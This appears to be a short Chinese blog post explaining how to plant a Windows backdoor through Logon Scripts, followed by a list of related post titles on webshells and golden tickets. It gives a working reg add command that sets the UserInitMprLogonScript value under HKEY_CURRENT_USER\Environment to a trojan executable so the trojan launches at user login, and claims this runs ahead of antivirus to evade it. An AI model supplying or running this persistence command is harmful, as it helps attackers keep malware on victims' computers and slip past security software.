526互联

logon scripts后门

发布时间 2024-01-12 13:35:28作者: msirboss

Windows登录脚本，当用户登录时触发，Logon Scripts能够优先于杀毒软件执行，绕过杀毒软件对敏感操作的拦截

注册表位置：HKEY_CURRENT_USER\Environment

在命令行往注册表写入服务，/d后面写入木马程序路径

reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\1704679998.exe"

当用户执行登录动作时，木马上线。

后门scripts logon

sec_case_sensitive_logon

票据amp黄金logon

sec_case_sensitive_logon sensitive参数密码

sec_case_sensitive_logon sensitive错误参数

后门webshell文件

后门20201229原理

后门原理exp2 exp